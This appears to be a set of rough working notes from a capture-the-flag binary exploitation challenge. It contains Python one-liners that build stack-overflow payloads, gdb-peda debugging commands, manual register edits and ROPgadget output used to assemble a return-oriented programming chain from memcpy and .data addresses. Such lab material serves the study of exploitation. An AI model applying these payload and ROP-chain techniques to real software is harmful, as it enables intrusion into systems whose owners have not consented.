Only middle right write

python -c 'print 127*"\xd5\x09\x40\x00\x00\x00\x00\x00"+"B"*7' >/tmp/x1 && gdb-peda ch40 -ex "r /tmp/x1"
python -c 'print 122*"\xd5\x09\x40\x00\x00\x00\x00\x00"+"\x40\x06\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x60\x00\x00\x00\x00\x00\x08\x01\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"+"B"*7' >/tmp/x1 && gdb-peda ch40 -ex "b *0x00000000004009d5" -ex "r /tmp/x1"

Ecart = 0x37a450
00000000004007e9 T get_file_content
0x600fc8       memcpy  "\x40\x06\x40\x00\x00\x00\x00\x00"
\x00\x00\x00\x00\x00\x00\x00\x00
.data 0x601000  "\x00\x10\x60\x00\x00\x00\x00\x00"
90 = 0x400108   "\x08\x01\x40\x00\x00\x00\x00\x00"
1               "\x01\x00\x00\x00\x00\x00\x00\x00"
x/64gx $rsp

set $rsp=0x3cf3d949110
set $rip=0x600fc8
set *0x3cf3d949118 =0x601000
set *0x3cf3d949120 =0x400108
set *0x3cf3d949128 =0x1  


app-systeme-ch40@challenge03:~$ ROPgadget --string "pen" --binary ch40
Strings information
============================================================
0x00000000004003ea : pen
0x0000000000400a83 : pen


Gadgets information
============================================================

0x0000000000400a4f : add bl, dh ; ret
0x00000000004009d3 : add cl, cl ; ret
0x0000000000400754 : add eax, 0x2008b6 ; add ebx, esi ; ret
0x000000000040071b : add eax, edx ; sar rax, 1 ; jne 0x40072c ; pop rbp ; ret
0x0000000000400759 : add ebx, esi ; ret
0x000000000040071a : add rax, rdx ; sar rax, 1 ; jne 0x40072d ; pop rbp ; ret
0x000000000040077d : call rax
0x0000000000400862 : dec ecx ; ret
0x00000000004006f7 : jmp rax
0x0000000000400737 : jmp rdx
0x0000000000400afb : jmp rsp
0x00000000004008ac : mov eax, dword ptr [rbp - 4] ; cdqe ; leave ; ret
0x0000000000400a3c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a3e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a40 : pop r14 ; pop r15 ; ret
0x0000000000400a42 : pop r15 ; ret
0x000000000040072e : pop rbp ; mov rsi, rax ; mov edi, 0x601010 ; jmp rdx
0x00000000004007e6 : pop rbx ; pop rbp ; ret
0x0000000000400a43 : pop rdi ; ret
0x0000000000400a41 : pop rsi ; pop r15 ; ret
0x00000000004005d9 : ret



memcpy= '\x40\x06\x40\x00\x00\x00\x00\x00'
null='\x00\x00\x00\x00\x00\x00\x00\x00'
data ='\x00\x10\x60\x00\x00\x00\x00\x00'
nine = '\x08\x01\x40\x00\x00\x00\x00\x00'
one='\x01\x00\x00\x00\x00\x00\x00\x00'